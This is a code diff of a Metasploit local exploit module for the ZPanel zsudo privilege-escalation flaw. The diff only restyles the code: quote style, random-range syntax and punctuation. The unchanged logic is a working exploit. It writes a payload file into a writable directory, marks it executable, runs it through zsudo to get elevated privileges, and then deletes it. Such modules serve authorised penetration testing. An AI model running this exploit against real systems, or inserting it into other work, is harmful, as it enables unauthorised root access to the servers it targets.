@@ -25,14 +25,13 @@ class MetasploitModule < Msf::Exploit::Local
           'License' => MSF_LICENSE,
           'Author' => [ 'sinn3r', 'juan vazquez' ],
           'DisclosureDate' => '2013-06-07',
-          'Platform' => %w{linux unix},
-          'Arch' => [ ARCH_CMD, ARCH_X86 ],
+          'Platform' => %w[linux unix],
           'SessionTypes' => [ 'shell', 'meterpreter' ],
           'Targets' => [
             [ 'Command payload', { 'Arch' => ARCH_CMD } ],
             [ 'Linux x86', { 'Arch' => ARCH_X86 } ]
           ],
-          'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
+          'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
           'DefaultTarget' => 0,
           'References' => [
             [ 'CVE', '2013-10052' ]
@@ -41,20 +40,20 @@ class MetasploitModule < Msf::Exploit::Local
             'Reliability' => UNKNOWN_RELIABILITY,
             'Stability' => UNKNOWN_STABILITY,
             'SideEffects' => UNKNOWN_SIDE_EFFECTS
-          },
+          }
         }
       )
     )
     register_options [
-      OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ])
+      OptString.new('zsudo', [ true, 'Path to zsudo executable', '/etc/zpanel/panel/bin/zsudo' ])
     ]
     register_advanced_options [
-      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ])
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ]
   end
 
   def check
-    if file?(datastore["zsudo"])
+    if file?(datastore['zsudo'])
       return CheckCode::Detected
     end
 
@@ -63,21 +62,21 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     if (target.arch.include? ARCH_CMD)
-      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
+      exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(rand(3..7))}.sh"
       # Using this way of writing the payload to avoid issues when failing to find
       # a command on the victim for writing binary data
-      cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
+      cmd_exec "echo \"#{payload.encoded.gsub(/"/, '\"')}\" > #{exe_file}"
     else
-      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
+      exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(rand(3..7))}.elf"
       write_file(exe_file, generate_payload_exe)
     end
 
     cmd_exec "chmod +x #{exe_file}"
 
-    print_status("Running...")
+    print_status('Running...')
 
     begin
-      cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
+      cmd_exec "#{datastore['zsudo']} #{exe_file} #{rand_text_alpha(rand(3..7))}"
     ensure
       cmd_exec "rm -f #{exe_file}"
     end
